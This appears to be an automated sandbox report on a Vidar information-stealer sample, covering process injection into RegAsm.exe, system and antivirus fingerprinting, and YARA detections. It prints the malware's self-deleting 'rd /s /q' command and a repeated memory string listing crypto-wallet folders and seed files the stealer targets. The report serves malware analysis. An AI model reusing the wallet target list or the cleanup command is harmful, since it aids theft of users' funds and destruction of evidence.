                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BF6008Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,3_2_6C8F4760
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7630 cpuid 0_2_006E7630
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006FB00C
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_006FB097
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006FB2EA
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006F2B47
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_006FB413
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006FB519
                  Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_006FB5E8
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006F25E1
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006FAF71
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006FAF26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7A2F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006E7A2F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,3_2_0040FBCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_0040FC92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
